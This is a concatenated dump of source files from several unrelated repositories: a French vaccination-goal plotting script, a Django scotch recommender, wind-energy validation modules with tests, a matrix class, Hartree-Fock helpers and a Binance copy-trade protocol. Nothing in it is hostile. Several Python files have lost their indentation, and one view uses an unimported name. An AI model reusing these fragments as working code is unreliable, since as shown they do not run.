cumul_injections_completes_18_ans += injections_completes
    #If the row covers injections for people aged 50 to 79...
elif 50 <= age <= 79:
cumul_primo_injections_50_ans += primo_injections
cumul_primo_injections_18_ans += primo_injections
cumul_injections_completes_18_ans += injections_completes
    #If the row covers injections for people aged 80 and over...
elif age == 80:
cumul_primo_injections_50_ans += primo_injections
primo_injections_50_ans.append(cumul_primo_injections_50_ans/pop_50_ans/obj_50_ans_1_dose*100)
cumul_primo_injections_50_ans = 0
cumul_primo_injections_18_ans += primo_injections
cumul_injections_completes_18_ans += injections_completes
primo_injections_18_ans.append(cumul_primo_injections_18_ans/pop_18_ans/obj_18_ans_1_dose*100)
injections_completes_18_ans.append(cumul_injections_completes_18_ans/pop_18_ans/obj_18_ans_tot_dose*100)
cumul_primo_injections_18_ans = 0
cumul_injections_completes_18_ans = 0
position_date_limite = len(liste_dates)-1 #Save the index of the last day with actual data
dernier_jour = liste_dates[-1] #Save the last day present in the data
#Build the list of dates up to the end date limit (if there is one)
while liste_dates[-1] != limite_date_fin and limite_date_fin != 0:
    date = datetime.strptime(liste_dates[-1], "%Y-%m-%d") + timedelta(days=1)
    liste_dates.append(date.strftime("%Y-%m-%d"))
#Convert every date from YYYY-MM-DD to DD/MM
for i in range(len(liste_dates)): liste_dates[i] = liste_dates[i][8:11]+"/"+liste_dates[i][5:7]
liste_dates_reduite = ecartDate(reduction(liste_dates)) #Reduce the date list while keeping the original
#Start building the graph
plt.figure(figsize = (16, 5)) #Set a 16:5 figure size
plt.tick_params(axis = 'x', rotation = 80) #Rotate the dates 80° so they stay readable
#Plot the solid curves (factual, not projections)
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(primo_injections_totales)))[:position_date_limite//limite_ecart_jour+1], "red", label = f"Objectif de primo-vaccinés ({int(obj_1_dose/1000000)} M)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(injections_completes_totales)))[:position_date_limite//limite_ecart_jour+1], "firebrick", label = f"Objectif de vaccinés ({int(obj_tot_dose/1000000)} M)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(primo_injections_50_ans)))[:position_date_limite//limite_ecart_jour+1], "orange", label = f"Objectif des +50 ans primo-vaccinés ({int(obj_50_ans_1_dose*100)}%)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(primo_injections_18_ans)))[:position_date_limite//limite_ecart_jour+1], "lawngreen", label = f"Objectif des +18 ans primo-vaccinés ({int(obj_18_ans_1_dose*100)}%)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(injections_completes_18_ans)))[:position_date_limite//limite_ecart_jour+1], "darkgreen", label = f"Objectif des +18 ans vaccinés ({int(obj_18_ans_tot_dose*100)}%)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(proportion_primo_vaccines)))[:position_date_limite//limite_ecart_jour+1], "cyan", label = "Référence : Français 100% primo-vaccinés")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(proportion_vaccines)))[:position_date_limite//limite_ecart_jour+1], "darkblue", label = "Référence : Français 100% vaccinés")
#Plot the dashed, projected curves
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(primo_injections_totales)))[position_date_limite//limite_ecart_jour:], "red", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(injections_completes_totales)))[position_date_limite//limite_ecart_jour:], "firebrick", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(primo_injections_50_ans)))[position_date_limite//limite_ecart_jour:], "orange", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(primo_injections_18_ans)))[position_date_limite//limite_ecart_jour:], "lawngreen", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(injections_completes_18_ans)))[position_date_limite//limite_ecart_jour:], "darkgreen", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(proportion_primo_vaccines)))[position_date_limite//limite_ecart_jour:], "cyan", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(proportion_vaccines)))[position_date_limite//limite_ecart_jour:], "darkblue", linestyle = '--')
#Shade the projected part of the curves in light gray, bounded by a dashed vertical line (unless the data were truncated)
if not empecher_valeurs_previsionnelles:
plt.axvline(x = liste_dates_reduite[position_date_limite//limite_ecart_jour], color = 'gray', linestyle = '--')
plt.axvspan(liste_dates_reduite[position_date_limite//limite_ecart_jour], liste_dates_reduite[-1], alpha = 0.5, color = 'lightgray')
plt.yticks(np.arange(y_min, y_max+0.01, 10)) #Cap y at 100% and force tick marks every 10%
plt.ylim(y_min, y_max+0.01) #Restrict the y-axis to the 0%-100% range
plt.grid() #Add a grid
plt.legend() #Show the legend entry next to each curve
plt.margins(0, 0) #Remove the inner margins
#Set the titles of the graph and of the x and y axes
plt.title(f"État des objectifs gouvernementaux pour la fin août (données du {nom_fichier[20:22]}/{nom_fichier[17:19]}/{nom_fichier[12:16]})")
plt.xlabel(f"""Dates\n\nLes prévisions sont faites à partir des {formatNombre(nb_jour_prediction)} jours précédents. En considérant une population de +18 ans de {formatNombre(pop_18_ans)} habitants et de +50 ans de {formatNombre(pop_50_ans)} habitants (Insee, 2021).
Dernier jour de remontée des données : {dernier_jour[8:]}/{dernier_jour[5:7]}/{dernier_jour[:4]}. Source des données sur Data.gouv et code du graphique disponible sur https://github.com/A2drien/VaccineGraph.""")
plt.ylabel("Pourcentage atteint des objectifs (%)")
#Save the image with the date of the data and strip the outer margins
plt.savefig(f"Objectifs Gouvernement.png", bbox_inches = 'tight')
plt.savefig(f"Archives Objectifs Gouvernement/Objectifs Gouvernement {nom_fichier[12:22]}.png", bbox_inches = 'tight')
os.remove("fichier_temporaire.html")
``` |
{
"source": "A2ed/affective-recommendation",
"score": 2
} |
#### File: app/recommendation/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.shortcuts import redirect
import ast
import random
from .forms import StateForm
from .scotchy import *
from .models import State, Scotch, EmotionScotchSimilarity
def home(request):
# initialize emotional state
initial={'emotional_state': request.session.get('emotional_state', None)}
# do this when posted
if request.method == 'POST':
# use form to get user's emotional state
form = StateForm(request.POST)
if form.is_valid():
# save to state model
form.save()
# record emotional state
request.session['emotional_state'] = form.cleaned_data['name']
# redirect to new view showing recommendations
return redirect('results')
#return HttpResponseRedirect(reverse('results'))
else:
form = StateForm()
return render(request, 'recommendation/home.html', {'form' : form})
def results(request):
emotional_state = request.session['emotional_state']
# initiate recommendation engine
recs = RecommendationEngine()
# get scotch recommendation idx based on emotion
idx = recs.get_rec(emotional_state)
# select scotch data from SQL database
rec = Scotch.objects.get(id=idx+1)
# get summaries for recommended scotch
adjs = ast.literal_eval(Summaries.objects.get(id=idx+1).summary)
# if more than three adjectives, randomly sample three from the list
if len(adjs) > 3:
adjs = random.sample(adjs, 3)
else:
pass
if len(rec.age) > 1:
context = {'emotion' : emotional_state,
'rec1_name' : rec.name,
'rec1_age' : rec.age,
'rec1_sum' : '. '.join(adjs) + '.'}
else:
context = {'emotion' : emotional_state,
'rec1_name' : rec.name,
'rec1_sum' : '. '.join(adjs) + '.'}
return render(request, 'recommendation/results.html', context)
``` |
{
"source": "a2edap/WE-Validate",
"score": 3
} |
#### File: WE-Validate/inputs/fino2_dats.py
```python
import os
import pathlib
import pandas as pd
import numpy as np
import glob
import sys
class fino2_dats:
"""FINO2 data class
"""
def __init__(self, info, conf):
self.path = os.path.join(
(pathlib.Path(os.getcwd()).parent), str(info['path'])
)
self.var = info['var']
# self.lev = conf['levels']['height_agl']
self.target_var = info['target_var']
def get_ts(self, lev):
"""The directory can contain multiple FINO2 files, and each file
contains data at one height level.
The function only read in one data file at one height level.
"""
file_list = glob.glob(os.path.join(self.path, '*.dat'))
for file in file_list:
if str(lev)+'m' in file:
df_all = pd.read_csv(file)
# Get variable name and column names
var_name = df_all.iloc[0][0].split(': ', 1)[1]
col_names = df_all.iloc[3][0].split('\t')[1:]
df = pd.read_csv(file, skiprows=6, sep='\s+')
# Turn column names into 1st row
df = pd.DataFrame(np.vstack([df.columns, df]))
# Combine 2 time columns, hard coded
df['t'] = df[0].map(str)+' '+df[1]
# Drop duplicating columns
df.pop(0)
df.pop(1)
# Reassign column names
for i in range(len(col_names)):
df[col_names[i]] = df[i+2]
df.pop(i+2)
df = df.set_index('t').sort_index()
df.index = pd.to_datetime(df.index)
# FINO data are averages centered at each 10-minute period
# Data between 10:30 and 10:40 are averaged and labelled as
# 10:35
# Apply correction to label data at the end of each period
# Hence data between 10:30 and 10:40 are averaged and labelled
# as 10:40
df.index = df.index+pd.Timedelta('5minutes')
# Extract only 1 column of data
out_df = df.loc[:, [self.var]]
out_df.rename(
columns={self.var: self.target_var}, inplace=True
)
out_df = out_df.astype(float)
return out_df
```
#### File: WE-Validate/inputs/pc_csv.py
```python
import os
import pathlib
import importlib
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from tools import eval_tools
class pc_csv:
"""Power curve class, using power curve from a csv file."""
def __init__(self, path, file, ws, power, hhws_df, hub_height, conf):
self.path = os.path.join(
(pathlib.Path(os.getcwd()).parent), str(path)
)
self.file = os.path.join(self.path, file)
self.ws = ws
self.power = power
# Declare hub height wind speed data frame
self.hhws_df = hhws_df
self.hh = hub_height
self.conf = conf
self.conf['reference']['var'] = self.power
self.plotting = eval_tools.get_module_class('plotting', 'plot_data')(
self.conf)
def get_power(self):
"""Convert wind speed into power using user-provided power curve."""
self.pc_df = pd.read_csv(self.file)
# Assume 0 power in the beginning
power_df = pd.DataFrame(
0, columns=self.hhws_df.columns+'_derived_power',
index=self.hhws_df.index
)
# For each dataset (i.e. each column in data frame)
for hh_col, p_col in zip(self.hhws_df.columns, power_df.columns):
# When wind speed is nan, assign power to nan
power_df.loc[np.isnan(self.hhws_df[hh_col]), p_col]\
= np.NaN
# For each wind speed (bin) in power curve
for i, row in self.pc_df.iterrows():
# Assign respective power when wind speed exceeds threshold
power_df.loc[self.hhws_df[hh_col] > row[self.ws], p_col]\
= row[self.power]
self.power_df = power_df.sort_index()
return self.power_df
def plot_pc(self):
"""Plot power curve."""
plt.plot(self.pc_df[self.ws], self.pc_df[self.power], c='k')
for hh_col, p_col in zip(self.hhws_df.columns, self.power_df.columns):
plt.scatter(self.hhws_df[hh_col], self.power_df[p_col])
plt.show()
def plot_power_ts(self):
"""Plot power time series."""
self.plotting.plot_ts_line(self.power_df, self.hh, self_units=False)
def plot_power_scatter(self):
"""Plot power scatterplot."""
self.plotting.plot_pair_scatter(self.power_df, self.hh,
self_units=False)
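# Illustrative sketch of get_power's step lookup above (hypothetical
# numbers): with a power curve of ws = [3, 12] -> power = [100, 1500],
# a hub-height wind speed of 2 m/s stays at 0, 5 m/s maps to 100,
# 13 m/s maps to 1500, and NaN wind speeds remain NaN.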
```
#### File: WE-Validate/inputs/wrf_netcdf.py
```python
import os
import pathlib
from datetime import datetime
from netCDF4 import Dataset
import numpy as np
import pandas as pd
from qc import check_input_data
class wrf_netcdf:
"""WRF data class, using data from NetCDF files.
Each NetCDF file should contain 1 time step of data.
"""
def __init__(self, info, conf):
self.path = os.path.join(
(pathlib.Path(os.getcwd()).parent), str(info['path'])
)
self.var = info['var']
self.target_var = info['target_var']
self.freq = info['freq']
self.flag = info['flag']
self.loc = conf['location']
try:
self.select_method = conf['reference']['select_method']
except KeyError:
self.select_method = 'instance'
# For WRF mountain wave demo case
def get_ij(self, ih):
"""Return data index (i and j) for nc file at a specified target
location.
"""
lat = np.array(ih['XLAT'])
lon = np.array(ih['XLONG'])
        # If lat/lon were arrays (instead of matrices)
        # something like this would work:
        # d = np.fromfunction(lambda x,y: (lon[x] - loc['lon'])**2
        # + (lat[y] - loc['lat'])**2, (len(lon), len(lat)), dtype=float)
# This is most appropriate for Equator coordinates
d = (lat - self.loc['lat'])**2 + (lon - self.loc['lon'])**2
i, j = np.unravel_index(np.argmin(d), d.shape)
return i, j
def get_ts(self, lev):
"""Get time series at a location at a certain height.
Resample data according to user-defined data frequency.
"""
df = pd.DataFrame({'t': [], self.target_var: []})
# To print an empty line before masked value error messages
mask_i = 0
for file in os.listdir(self.path):
data = Dataset(os.path.join(self.path, file), 'r')
i, j = self.get_ij(data)
s = file.split('_')[2]+'_'+file.split('_')[3].split('.')[0]+':'\
+ file.split('_')[4]+':'+file.split('_')[5].split('.')[0]
t = datetime.strptime(s, '%Y-%m-%d_%H:%M:%S')
height_ind = np.where(data['level'][:].data == lev)[0][0]
u = data.variables[self.var[0]][height_ind][i][j]
v = data.variables[self.var[1]][height_ind][i][j]
ws = np.sqrt(u**2 + v**2)
ws, mask_i = check_input_data.convert_mask_to_nan(ws, t, mask_i)
ws = check_input_data.convert_flag_to_nan(ws, self.flag, t)
data.close()
df = pd.concat([df, pd.DataFrame([{'t': t, self.target_var: ws}])])
df = df.set_index('t').sort_index()
# Same process as in the crosscheck_ts class
time_diff = df.index.to_series().diff()
if len(time_diff[1:].unique()) == 1:
if self.freq > time_diff[1].components.minutes:
df = df.resample(
str(self.freq)+'T', label='right',
closed='right')
if self.select_method == 'average':
df = df.mean()
if self.select_method == 'instance':
df = df.asfreq()
df = check_input_data.verify_data_file_count(df, self.target_var,
self.path, self.freq
)
return df
```
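`get_ij` above minimizes a squared difference in degrees, which distorts distances away from the equator (a degree of longitude shrinks with latitude). A great-circle alternative, offered as a sketch rather than part of the module, would be:
```python
import numpy as np

def nearest_ij_haversine(lat2d, lon2d, loc, r_earth_km=6371.0):
    # great-circle distance handles meridian convergence at high latitudes,
    # unlike the squared-degree metric used in get_ij
    lat1, lon1 = np.radians(lat2d), np.radians(lon2d)
    lat0, lon0 = np.radians(loc['lat']), np.radians(loc['lon'])
    a = (np.sin((lat1 - lat0) / 2)**2
         + np.cos(lat0) * np.cos(lat1) * np.sin((lon1 - lon0) / 2)**2)
    d = 2.0 * r_earth_km * np.arcsin(np.sqrt(a))
    return np.unravel_index(np.argmin(d), d.shape)
```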
#### File: WE-Validate/metrics/mae.py
```python
import numpy as np
class mae:
def compute(self, x, y):
return float(np.mean(abs(x - y)))
```
#### File: WE-Validate/metrics/test_metrics.py
```python
import importlib
import pandas as pd
import math
from tools import eval_tools
test_dir = 'metrics'
# Example data series
x_eg = pd.Series([2, 2, 2, 2, 16])
y_eg = pd.Series([4, 5, 6, -7, 8])
def read_metric(metric):
return eval_tools.get_module_class(test_dir, metric)()
def test_bias():
assert read_metric('bias').compute(5, 4) == -1
def test_series_bias():
assert read_metric('bias').compute(x_eg, y_eg) == -1.6
def test_bias_pct():
assert read_metric('bias_pct').compute(5, 4) == -20
def test_series_bias_pct():
assert read_metric('bias_pct').compute(x_eg, y_eg) == -10
def test_mae():
assert read_metric('mae').compute(5, 4) == 1
def test_series_mae():
assert read_metric('mae').compute(x_eg, y_eg) == 5.2
def test_mae_pct():
assert read_metric('mae_pct').compute(5, 4) == 20
def test_series_mae_pct():
assert read_metric('mae_pct').compute(x_eg, y_eg) == 190
def test_series_rmse():
result = read_metric('rmse').compute(x_eg, y_eg)
assert math.isclose(result, 5.899, rel_tol=1e-4)
def test_series_crmse():
result = read_metric('crmse').compute(x_eg, y_eg)
assert math.isclose(result, 5.678, rel_tol=1e-4)
``` |
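The `rmse` and `crmse` modules exercised by the last two tests are not included in this dump. Minimal sketches that mirror the `mae` class style and reproduce the expected values for the example series (≈5.899 and ≈5.678) would be:
```python
import numpy as np

class rmse:
    def compute(self, x, y):
        return float(np.sqrt(np.mean((x - y)**2)))

class crmse:
    # centered RMSE: subtract each series' mean before differencing,
    # so only the pattern error (not the overall bias) is measured
    def compute(self, x, y):
        return float(np.sqrt(np.mean(((x - np.mean(x)) - (y - np.mean(y)))**2)))
```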
{
"source": "a2evans/ProjectMM",
"score": 4
} |
#### File: ProjectMM/ProjectMM/MatrixC.py
```python
__author__ = '<NAME>'
__email__ = '<EMAIL>'
# file for the matrix class
class MatrixC:
# initialization
def __init__(self, r, c):
self.data = [[0 for q in range(0, c)]for p in range(0, r)]
self.r = r
self.c = c
# accessor
def __getitem__(self, r):
return self.data[r]
# setter
def __setitem__(self, key, value):
self.data[key[0]][key[1]] = value
# addition
def __add__(self, other):
if self.r != other.r or self.c != other.c:
print("Error: incompatible size of matrices, output not defined.")
return
result = MatrixC(self.r, self.c)
for i in range(0, self.r):
for j in range(0, self.c):
result.data[i][j] = self.data[i][j] + other.data[i][j]
return result
def __sub__(self, other):
if self.r != other.r or self.c != other.c:
print("Error: incompatible size of matrices, output not defined.")
return
result = MatrixC(self.r, self.c)
for i in range(0, self.r):
for j in range(0, self.c):
result.data[i][j] = self.data[i][j] - other.data[i][j]
return result
# multiply two matrices together
def __mul__(self, other):
if self.c != other.r:
print("Error: incompatible size of matrices output not defined.")
return
matrixA = MatrixC(self.r, other.c)
# grab the row of self and column
for i in range(0, self.r):
# for every element in the row
for j in range(0, other.c):
sum = 0
for k in range(0, self.c):
sum += self.data[i][k] * other.data[k][j]
matrixA[i][j] = sum
return matrixA
# print function
def print_mc(self):
for i in range(0, len(self.data)):
print(self.data[i])
``` |
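A quick usage sketch of MatrixC. With the `__setitem__` fix above, element assignment also works through the row list returned by `__getitem__`:
```python
a = MatrixC(2, 3)
b = MatrixC(3, 2)
for i in range(2):
    for j in range(3):
        a[i][j] = i + j        # assigns through the row from __getitem__
        b[j][i] = i * j
c = a * b                      # 2x3 times 3x2 -> 2x2 product
c.print_mc()
(a + a).print_mc()             # element-wise sum of same-shape matrices
```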
{
"source": "a2ff/splitrom",
"score": 2
} |
#### File: a2ff/splitrom/identify.py
```python
import sys, splitrom
def _usage():
print(F"usage: {sys.argv[0]} <version> <ROM dumps in order n..0, hi..lo>"); sys.exit(1)
try:
splitrom.checkFiles(sys.argv[2:])
print("\nif ROMs unidentified, add this to splitrom/known.py:")
splitrom.prettySplits(sys.argv[1], sys.argv[2:], len(sys.argv[2:])//2)
except Exception as e: print(e); _usage()
``` |
{
"source": "A2-forever/code",
"score": 3
} |
#### File: python/Hatree Fock/FUNCTION_HF1.py
```python
import numpy as np
from FUNCTION_HF2 import *
eps = 1e-6
def Get_n(file_name): #get the number of basis functions and the alpha/beta electron counts
flag=0
with open("data\\"+file_name, 'r') as f:
for line in f:
temp=line.split()
l=len(temp)
if(l<6):
continue
if(temp[1]+" "+temp[2]=="basis functions,"):
n=int(temp[0]) #number of basis functions
flag=flag+1
elif(temp[1]+" "+temp[2]=="alpha electrons"):
n_alpha=int(temp[0]) #number of alpha electrons
n_beta=int(temp[3]) #number of beta electrons
flag=flag+1
if(flag==2):
break
return n,n_alpha,n_beta #number of basis functions, alpha and beta electron counts
def Get_INT(file_name,n): #read the overlap integrals, core-Hamiltonian integrals and two-electron integrals
S=np.mat(np.zeros([n,n]))
H=np.mat(np.zeros([n,n]))
TE_INT=np.zeros([n,n,n,n])
index=[0]*5 #Gaussian usually prints five values per line
count_completed = 0 #how many matrices have been fully read; three are needed here
count_processing=0 #which matrix is currently being read
flag=0 #0: skip this line and move on; 1: reading finished; 2: normal read
with open("data\\"+file_name, 'r') as f:
for line in f:
if(line==" *** Overlap *** \n" ):
count_processing=1
continue
elif(line==" ****** Core Hamiltonian ****** \n"):
count_processing=2
continue
elif(line==" *** Dumping Two-Electron integrals ***\n"):
count_processing=3
continue
if(count_processing==count_completed): #one matrix is fully read but the next has not started yet
continue #normally completed != processing while reading; a few special lines appear at the start of each block
elif(count_processing==3): #reading the two-electron integrals
flag=Read_TE_INT(line,TE_INT)
if(flag==1):
count_completed=3
break
elif(count_processing==1): #reading the overlap matrix
flag=Read_Matrix_INT(line,S,index)
if(flag==1):
count_completed=1
elif(count_processing==2): #reading the core-Hamiltonian matrix
flag=Read_Matrix_INT(line,H,index)
if(flag==1):
count_completed=2
return S,H,TE_INT
def Fock_G(P,TE_INT): #density matrix over basis functions, plus the 4-index two-electron integral array
n=P.shape[0]
G = np.zeros_like(P)
#a=1-3j
#G=G+a
for i in range(0,n):
for j in range(0,n): #build the Fock G matrix element by element
for k in range(0,n):
for l in range(0,n):
G[i,j]=G[i,j]+P[l,k]*(2*TE_INT[i][j][k][l]-TE_INT[i][l][k][j])
#print(G[i][j])
return G
'''
def Write_Matrix(M,file_name): #write a 2-D matrix to a file
with open("data\\"+file_name,'w') as f:
for i in range(0,M.shape[0]):
for j in range(0,M.shape[1]):
f.write(str(M[i,j].real)+"\t")
f.write("\n")
'''
``` |
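The driver that iterates these helpers to self-consistency is not shown in the dump. A minimal closed-shell SCF sketch built on `Get_n`/`Get_INT`/`Fock_G` could look like the following; the file name is hypothetical, and the symmetric-orthogonalization and convergence details are my assumptions rather than the author's code:
```python
import numpy as np
from FUNCTION_HF1 import Get_n, Get_INT, Fock_G, eps

file_name = 'h2o.log'                    # hypothetical Gaussian output under data\
n, n_alpha, n_beta = Get_n(file_name)
S, H, TE_INT = Get_INT(file_name, n)
S, H = np.asarray(S), np.asarray(H)

# symmetric orthogonalization: X = S^(-1/2)
s_val, s_vec = np.linalg.eigh(S)
X = s_vec @ np.diag(s_val**-0.5) @ s_vec.T

P = np.zeros((n, n))                     # zero-density initial guess
for it in range(100):
    F = H + np.asarray(Fock_G(P, TE_INT))   # Fock matrix F = H + G(P)
    e, C = np.linalg.eigh(X.T @ F @ X)      # diagonalize in the orthogonal basis
    C = X @ C                               # back-transform MO coefficients
    C_occ = C[:, :n_alpha]                  # doubly occupied MOs (closed shell)
    P_new = C_occ @ C_occ.T
    if np.max(np.abs(P_new - P)) < eps:     # eps = 1e-6 from the module
        break
    P = P_new
```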
{
"source": "a2gs/BinanceCopyTrade",
"score": 2
} |
#### File: a2gs/BinanceCopyTrade/BinanceCTProto.py
```python
from BinanceCTUtil import getTimeStamp
import json
CT_CMD_COPYTRADE = "COPYTRADE"
CT_CMD_PING = "PING"
CT_CMD_CANCELORDER = "CANCEL ORDER"
CT_CMD_GETOPENORDERS = "OPENORDERS"
CT_TYPE_RESPONSE = "RESP"
CT_TYPE_REQUEST = "REQ"
# Response RefNum (data['ret'])
CT_PROTO_RESP_OK = 0
CT_PROTO_RESP_PING = 1
CT_PROTO_RESP_BAD_PROTO = 2
CT_PROTO_COPYTRADE_ERROR1 = 3
CT_PROTO_COPYTRADE_ERROR2 = 4
CT_PROTO_COPYTRADE_ERROR3 = 5
class CT_PROTO:
cmd = ""
fromto = {'from' : "", 'to': ""}
timestamp = ""
cmdtype = ""
resp_timestamp = ""
data = object()
def __init__(self,
_cmd = "",
_fromto_from = "",
_fromto_to = "",
_timestamp = "",
_cmdtype = "",
_resp_timestamp = "",
_data = object()):
self.cmd = _cmd
# build the dict per instance; mutating the class-level one would share state across messages
self.fromto = {'from' : _fromto_from, 'to' : _fromto_to}
self.timestamp = _timestamp
self.cmdtype = _cmdtype
self.resp_timestamp = _resp_timestamp
self.data = _data
def formatToNet(self)->[bool, str]:
msg = {
'cmd' : self.cmd,
'fromto' : {
'from' : self.fromto['from'],
'to' : self.fromto['to']
},
'timestamp' : self.timestamp,
'type' : self.cmdtype,
'resp_timestamp' : self.resp_timestamp,
}
msg['data'] = {}
try:
if self.cmd == CT_CMD_COPYTRADE:
if msg['type'] == CT_TYPE_REQUEST:
msg['data']['symbol'] = self.data.symbol
msg['data']['side'] = self.data.side
msg['data']['ordid'] = self.data.ordid
msg['data']['ordtype'] = self.data.ordtype
msg['data']['qtd'] = self.data.qtd
msg['data']['price'] = self.data.price
msg['data']['priceStop'] = self.data.priceStop
msg['data']['priceLimit'] = self.data.priceLimit
elif msg['type'] == CT_TYPE_RESPONSE:
msg['data']['ret'] = self.data.ret
msg['data']['retmsg'] = self.data.retmsg
elif self.cmd == CT_CMD_CANCELORDER:
if msg['type'] == CT_TYPE_REQUEST:
msg['data'] = { 'server_order_id' : self.data.server_order_id }
elif msg['type'] == CT_TYPE_RESPONSE:
msg['data']['ret'] = self.data.ret
msg['data']['retmsg'] = self.data.retmsg
elif self.cmd == CT_CMD_GETOPENORDERS:
if msg['type'] == CT_TYPE_REQUEST:
msg['data'] = { 'openorders' : [] }
[msg['data']['openorders'].append(i.element) for i in self.data.open_orders]
elif msg['type'] == CT_TYPE_RESPONSE:
msg['data']['ret'] = self.data.ret
msg['data']['retmsg'] = self.data.retmsg
except Exception as e:
return([False, f"Index error: {e}"])
return([True, json.dumps(msg)])
def loadFromNet(self, msgRecv):
jsonDump = json.loads(msgRecv)
self.cmd = jsonDump['cmd']
self.fromto['from'] = jsonDump['fromto']['from']
self.fromto['to'] = jsonDump['fromto']['to']
self.timestamp = jsonDump['timestamp']
self.cmdtype = jsonDump['type']
self.resp_timestamp = jsonDump['resp_timestamp']
if self.cmd == CT_CMD_COPYTRADE:
self.data = CT_PROTO_COPYTRADE_DATA()
if self.cmdtype == CT_TYPE_REQUEST:
self.data.symbol = jsonDump['data']['symbol']
self.data.side = jsonDump['data']['side']
self.data.ordid = jsonDump['data']['ordid']
self.data.ordtype = jsonDump['data']['ordtype']
self.data.qtd = jsonDump['data']['qtd']
self.data.price = jsonDump['data']['price']
self.data.priceStop = jsonDump['data']['priceStop']
self.data.priceLimit = jsonDump['data']['priceLimit']
elif self.cmdtype == CT_TYPE_RESPONSE:
self.data.ret = jsonDump['data']['ret']
self.data.retmsg = jsonDump['data']['retmsg']
elif self.cmd == CT_CMD_CANCELORDER:
self.data = CT_PROTO_CANCELORDER_DATA()
if self.cmdtype == CT_TYPE_REQUEST:
self.data.server_order_id = jsonDump['data']['server_order_id']
elif self.cmdtype == CT_TYPE_RESPONSE:
self.data.ret = jsonDump['data']['ret']
self.data.retmsg = jsonDump['data']['retmsg']
elif self.cmd == CT_CMD_GETOPENORDERS:
self.data = CT_PROTO_GETOPENORDERS()
if self.cmdtype == CT_TYPE_REQUEST:
# TODO: copy data set
pass
elif self.cmdtype == CT_TYPE_RESPONSE:
self.data.ret = jsonDump['data']['ret']
self.data.retmsg = jsonDump['data']['retmsg']
else:
self.data = None
class CT_PROTO_CANCELORDER_DATA:
server_order_id = ""
def __init__(self, _server_order_id = ""):
self.server_order_id = _server_order_id
class CT_PROTO_GETOPENORDERS_INFO:
def __init__(self, _symbol = "", _ordid = "", _side = "", _ordtype = "", _price = "", _server_order_id_ref = ""):
# build the dict per instance; a class-level dict would be shared by every order in the list
self.element = {
'symbol' : _symbol,
'ordid' : _ordid,
'side' : _side,
'ordtype' : _ordtype,
'price' : _price,
'server_order_id_ref' : _server_order_id_ref
}
class CT_PROTO_GETOPENORDERS:
open_orders = []
def __init__(self):
self.open_orders = []
class CT_PROTO_COPYTRADE_DATA:
symbol = ""
side = ""
ordid = ""
ordtype = ""
qtd = ""
price = ""
priceStop = ""
priceLimit = ""
def __init__(self, _symbol = "", _ordid = "", _side = "", _ordtype = "", _price = "", _qtd = "", _priceLimit = "", _priceStop = ""):
self.symbol = _symbol
self.ordid = _ordid
self.side = _side
self.ordtype = _ordtype
self.qtd = _qtd
self.price = _price
self.priceStop = _priceStop
self.priceLimit = _priceLimit
def __str__(self):
return(f"Symbol {self.symbol}|OrderId {self.ordid}|Side {self.side}|Qtd {self.qtd}|Type {self.ordtype}|Price {self.price}|StopPrice {self.priceStop}|LimitPrice {self.priceLimit}")
class CT_PROTO_RESPONSE:
ret = 0
retmsg = ""
def __init__(self, _ret : int = 0, _retmsg : str = ""):
self.ret = _ret
self.retmsg = _retmsg
def dumpCmdToLog(dumpCmd : CT_PROTO, log):
log(f"Command...........: [{dumpCmd.cmd}]")
log(f"From..............: [{dumpCmd.fromto['from']}]")
log(f"To................: [{dumpCmd.fromto['to']}]")
log(f"Type..............: [{dumpCmd.cmdtype}]")
log(f"Timestamp.........: [{dumpCmd.timestamp}]")
log(f"Response timestamp: [{dumpCmd.resp_timestamp}]")
log("Data:")
if dumpCmd.cmd == CT_CMD_COPYTRADE:
if dumpCmd.cmdtype == CT_TYPE_RESPONSE:
log(f"\tReturn........: [{dumpCmd.data.ret}]")
log(f"\tReturn message: [{dumpCmd.data.retmsg}]")
elif dumpCmd.cmdtype == CT_TYPE_REQUEST:
log(f"\tSymbol....: [{dumpCmd.data.symbol}]")
log(f"\tSide......: [{dumpCmd.data.side}]")
log(f"\tId........: [{dumpCmd.data.ordid}]")
log(f"\tQtd.......: [{dumpCmd.data.qtd}]")
log(f"\tType......: [{dumpCmd.data.ordtype}]")
log(f"\tPrice.....: [{dumpCmd.data.price}]")
log(f"\tStopPrice.: [{dumpCmd.data.priceStop}]")
log(f"\tLimitPrice: [{dumpCmd.data.priceLimit}]")
else:
log("Unknow data structure for this cmd type.")
elif dumpCmd.cmd == CT_CMD_PING:
if dumpCmd.cmdtype == CT_TYPE_RESPONSE:
log(f"\tReturn........: [{dumpCmd.data.ret}]")
log(f"\tReturn message: [{dumpCmd.data.retmsg}]")
elif dumpCmd.cmdtype == CT_TYPE_REQUEST:
log("\tTODO 1...")
else:
log("Unknow data structure for this cmd type.")
elif dumpCmd.cmd == CT_CMD_CANCELORDER:
if dumpCmd.cmdtype == CT_TYPE_RESPONSE:
log(f"\tReturn........: [{dumpCmd.data.ret}]")
log(f"\tReturn message: [{dumpCmd.data.retmsg}]")
elif dumpCmd.cmdtype == CT_TYPE_REQUEST:
